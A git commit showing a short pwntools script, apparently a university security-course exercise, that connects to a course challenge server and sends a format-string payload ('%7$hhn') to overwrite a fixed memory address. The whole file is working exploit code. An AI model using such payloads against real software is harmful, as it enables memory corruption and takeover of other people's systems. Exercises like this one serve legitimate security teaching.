This commit is contained in:
2026-01-08 19:16:57 +00:00
parent 555b9062f3
commit 82e15702a7
22 changed files with 376 additions and 0 deletions

View File

@@ -0,0 +1,16 @@
from pwn import remote, process, p32
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25193
conn = remote(HOST, PORT)
#conn = process("03_write")
#input()
tgt_addr = p32(0x804c040)
pl = tgt_addr+b"AAAA.%7$hhn\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)